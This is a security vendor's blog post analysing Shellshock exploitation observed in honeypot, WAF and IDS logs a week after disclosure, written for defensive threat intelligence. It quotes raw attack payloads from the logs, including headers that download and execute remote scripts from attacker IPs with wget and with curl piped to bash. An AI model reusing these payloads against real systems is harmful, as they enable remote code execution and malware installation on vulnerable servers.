Trustwave and Cybereason Merge to Form Global MDR Powerhouse for Unparalleled Cybersecurity Value. Learn More

Trustwave and Cybereason Merge to Form Global MDR Powerhouse for Unparalleled Cybersecurity Value. Learn More

Services
Managed Detection & Response

Eliminate active threats with 24/7 threat detection, investigation, and response.

Co-Managed SOC (SIEM)

Maximize your SIEM investment, stop alert fatigue, and enhance your team with hybrid security operations support.

Advisory & Diagnostics

Advance your cybersecurity program and get expert guidance where you need it most.

Penetration Testing

Test your physical locations and IT infrastructure to shore up weaknesses before exploitation.

Database Security

Prevent unauthorized access and exceed compliance requirements.

Email Security

Stop email threats others miss and secure your organization against the #1 ransomware attack vector.

Digital Forensics & Incident Response

Prepare for the inevitable with 24/7 global breach response in-region and available on-site.

Firewall & Technology Management

Mitigate risk of a cyberattack with 24/7 incident and health monitoring and the latest threat intelligence.

Solutions
BY TOPIC
Microsoft Security
Unlock the full power of Microsoft Security
Offensive Security
Solutions to maximize your security ROI
Rapidly Secure New Environments
Security for rapid response situations
Securing the Cloud
Safely navigate and stay protected
Securing the IoT Landscape
Test, monitor and secure network objects
Why Trustwave
About Us
Awards and Accolades
Trustwave SpiderLabs Team
Trustwave Fusion Security Operations Platform
Trustwave Security Colony
Partners
Technology Alliance Partners
Key alliances who align and support our ecosystem of security offerings
Trustwave PartnerOne Program
Join forces with Trustwave to protect against the most advance cybersecurity threats

Shellshock a Week Later: What We Have Seen

Trustwave, like most other information security firms, has been busy investigating the ShellShock vulnerability and subsequent scanning and exploit attempts. The SpiderLabs team at Truswave wanted to give the community some feedback on what we are seeing happening "in the wild" and a status on the detections and coverages we have in the relevant Trustwave services and product portfolio.

Attacks in the Wild

Honeypot Alerts

The first indications we received of scanning and exploit attempts came in from our web-based honeypot systems early on September 25 just after public announcement of the vulnerability. You can see in these examples from the Apache access_logs that attackers were scanning sites by adding attack payloads to either Referer or User-Agent field request headers:

162.253.66.76 - - [25/Sep/2014:00:24:27 -0400] "GET / HTTP/1.0" 400 226 "() { :; }; wget -O /tmp/besh http://162.253.66.76/nginx; chmod 777 /tmp/besh; /tmp/besh;" "Thanks-Rob"
162.253.66.76 - - [25/Sep/2014:00:24:35 -0400] "GET / HTTP/1.0" 400 226 "() { :; }; wget -O /tmp/besh http://162.253.66.76/nginx; chmod 777 /tmp/besh; /tmp/besh;" "Thanks-Rob"
162.253.66.76 - - [25/Sep/2014:00:24:35 -0400] "GET / HTTP/1.0" 400 226 "() { :; }; wget -O /tmp/besh http://162.253.66.76/nginx; chmod 777 /tmp/besh; /tmp/besh;" "Thanks-Rob"
162.253.66.76 - - [25/Sep/2014:00:24:37 -0400] "GET / HTTP/1.0" 400 226 "() { :; }; wget -O /tmp/besh http://162.253.66.76/nginx; chmod 777 /tmp/besh; /tmp/besh;" "Thanks-Rob"
209.126.230.72 - - [25/Sep/2014:00:47:40 -0400] "GET / HTTP/1.0" 200 10303 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
209.126.230.72 - - [25/Sep/2014:03:13:23 -0400] "GET / HTTP/1.0" 200 2564 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
209.126.230.72 - - [25/Sep/2014:03:14:26 -0400] "GET / HTTP/1.0" 200 16 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
89.207.135.125 - - [25/Sep/2014:03:43:04 -0400] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 - "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
89.207.135.125 - - [25/Sep/2014:03:49:19 -0400] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 - "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
89.207.135.125 - - [25/Sep/2014:03:50:17 -0400] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 - "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
209.126.230.72 - - [25/Sep/2014:05:59:22 +0900] "GET / HTTP/1.0" 200 22231 "() { :; }; ping -c 11 216.75.60.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
89.207.135.125 - - [25/Sep/2014:06:35:21 -0400] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 - "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
89.207.135.125 - - ...

While this data is useful, it is limited to only what is logged by default Apache combined log format. If we look deeper at some of the full HTTP audit logs from the ModSecurity WAF audit log format, we can see more interesting header attacks including cookies and custom headers:

cookie: () { :; }; /bin/bash -c 'rm /tmp/._tmp; uu="x5w3h5abg6"; up="5KWqDPzkwO"; u="http://82.118.242.208:8009/?ii=13f15d9c98ccd171e9e41638da29ed5c&ij=aHR0cDovL21vZHNlY3VyaXR5Lm9yZy8%3D"; curl -u $uu:$up $u | /bin/bash; lwp-request -m POST -H 'Authorization: Basic eDV3M2g1YWJnNjo1S1dxRFB6a3dP' $u | /bin/bash; wget -O- --http-user $uu --http-password $up $u | /bin/bash'
variable-auth_method: () { :; }; /bin/bash -c 'rm /tmp/._tmp; uu="x5w3h5abg6"; up="5KWqDPzkwO"; u="http://82.118.242.208:8009/?ii=13f15d9c98ccd171e9e41638da29ed5c&ij=aHR0cDovL21vZHNlY3VyaXR5Lm9yZy8%3D"; curl -u $uu:$up $u | /bin/bash; lwp-request -m POST -H 'Authorization: Basic eDV3M2g1YWJnNjo1S1dxRFB6a3dP' $u | /bin/bash; wget -O- --http-user $uu --http-password $up $u | /bin/bash'

As you can see, these attacks are mainly trying to either confirm the existence of the vulnerability or actual exploit attempts to download and execute malware.

Trustwave Web Application Firewall (WAF) Research Deployments

In addition to our web honeypots that run ModSecurity, Trustwave SpiderLabs also has access to research deployments of our Trustwave Web Application Firewall (WAF) product. Our WAF already has built-in attack payload detections for OS Command Injection attacks that would catch the vast majority of attack payloads such as: echo, cat, ping, etc. In addition to this default protection, we wanted to see specific exploit attempts for this vulnerability so we quickly added in this "User Defined Rule":

7831_0a7001e9-1738-43a7-b753-882ed997d10e

Let's take a closer look at a few alert examples taken from our Trustwave WAF research deployment.

Proof of Concept (PoC) Scanning

8521_2dc36ca2-87f8-4195-aeeb-c66a0470d1ac

This client seems to only be testing whether the exploit works.

"Helpful" PoC Scanning

7685_039ec36b-fc7b-4b7d-b2c7-13a67a932a6d

This client is going a step further by trying to notify the website owner that their site may be vulnerable to Shellshock and refers to their website for more information.

Vulnerable Host Enumeration

8478_2b21181a-5753-4e0d-aaee-bf10256c0a5f

This example attack is interesting for two reasons:

  1. The attack source was from China, and
  2. The attack payload looked to be part of some effort to map the internet (the Host headers were IP addresses) for vulnerable hosts for some later attack

Reverse Shell Tunneling

12061_d735167b-f416-46f9-b577-b8eaa40fab30

This client from Brazil was attempting to use Netcat to send back a reverse shell to their address.

IDS Alerts from Trustwave Managed Security Services (MSS)

In addition to our WAF products, Trustwave Managed Security Services (MSS) also saw a huge spike in attack traffic for this vulnerability since September 25:

  • SID 31978: 560 alerts
  • SID 4100272: 7,834 alerts

10607_91a9452d-af22-45ed-a96b-39c94765dbde

Attack Source Analysis

Attack source attribution is challenging as attackers will often loop their traffic through TOR, anonymous proxy servers or even compromised systems. This means that the true origin of the attacks could be from anywhere. Applying some attack source analysis did show that TOR is actively being used to send attack traffic.

Protections and Detections for Trustwave Customers

For more information about Shellshock and Trustwave products and services that can help detect or protect against attacks on the vulnerability, visit the Trustwave blog.

Conclusion

As the data in this blog post illustrates, the threat level for this vulnerability is high due to the prevalence of the vulnerability and the large number of active exploit attempts in the wild. We urge all Trustwave customers to do the following:

  • Patch - Apply all relevant patches from vendors to update bash.
  • Identify - Leverage vulnerability scanners to help determine which systems are vulnerable to known attack vectors. Trustwave will continue to add detection and protection signatures as research progresses.
  • Protect - Protect systems from attack attempts with security products such as IDS/IPS and WAF.

Trustwave will continue to monitor this vulnerability and update protections and detections as needed.

Stay safe out there.

I would like to thank the following SpiderLabs Research team members who helped to ensure that their respective products were updated and also gathered threat intelligence for this blog post:

  • Oren Hafif - Researcher for Trustwave WAF
  • James Espinosa - Researcher for Trustwave IDS/IPS
  • Jonathan Claudius - Lead Security Researcher for Trustwave Vulnerability Management
  • Abhishek Rahirkar - Researcher for Trustwave App Scanner
  • Jeff Pold - Director of Security Information Services for Trustwave SIEM

Additional Resources

Webinar—Trustwave on Shellshock: What You Need to Know

ABOUT TRUSTWAVE

Trustwave is a globally recognized cybersecurity leader that reduces cyber risk and fortifies organizations against disruptive and damaging cyber threats. Our comprehensive offensive and defensive cybersecurity portfolio detects what others cannot, responds with greater speed and effectiveness, optimizes client investment, and improves security resilience. Learn more about us.

Latest Intelligence

Discover how our specialists can tailor a security program to fit the needs of
your organization.

Request a Demo